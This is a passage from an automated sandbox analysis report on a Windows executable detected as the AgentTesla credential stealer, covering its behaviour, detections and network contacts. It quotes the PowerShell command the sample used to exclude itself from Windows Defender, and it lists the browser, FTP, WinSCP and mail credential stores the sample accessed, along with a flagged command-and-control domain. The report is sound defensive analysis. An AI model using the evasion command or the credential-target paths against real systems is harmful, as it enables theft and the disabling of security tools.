                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197547Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197422Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197312Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197203Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1197083Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196953Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196843Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196734Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196625Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196515Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196403Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196297Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196187Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1196078Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195969Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195844Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195700Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195592Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195482Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195375Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195266Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195156Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1195019Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194891Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194766Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194641Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194531Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeThread delayed: delay time: 1194422Jump to behavior
                      Source: hesaphareketi-.exe, 00000004.00000002.3683175969.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%O
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory written: C:\Users\user\Desktop\hesaphareketi-.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6760, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6760, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6760, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		1
                      Exfiltration Over Alternative Protocol                      		Abuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		111
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model21
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSH1
                      Clipboard Data                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      hesaphareketi-.exe37%VirustotalBrowse
                      hesaphareketi-.exe39%ReversingLabs
                      hesaphareketi-.exe100%AviraHEUR/AGEN.1323929
                      hesaphareketi-.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      ftp.normagroup.com.tr11%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://ftp.normagroup.com.tr100%Avira URL Cloudmalware
                      http://ftp.normagroup.com.tr11%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ftp.normagroup.com.tr
                      		104.247.165.99
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://ftp.normagroup.com.trhesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmptrue
                      • 11%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      https://account.dyn.com/hesaphareketi-.exe, 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareketi-.exe, 00000000.00000002.1238001511.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      104.247.165.99
                      		ftp.normagroup.com.trUnited States
                      		8100ASN-QUADRANET-GLOBALUStrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1463495
                      Start date and time:2024-06-27 09:18:58 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:hesaphareketi-.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/6@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 182
                      • Number of non-executed functions: 18
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      03:19:48API Interceptor11524180x Sleep call for process: hesaphareketi-.exe modified
                      03:19:50API Interceptor13x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.247.165.99hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                        hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                          19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                            CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exeGet hashmaliciousAgentTeslaBrowse
                              hesaphareketi-14-06-2024.exeGet hashmaliciousAgentTeslaBrowse
                                hesaphareketi01.exeGet hashmaliciousAgentTeslaBrowse
                                  hesaphareketi01--.exeGet hashmaliciousAgentTeslaBrowse
                                    hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                        hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse

                                          Domains

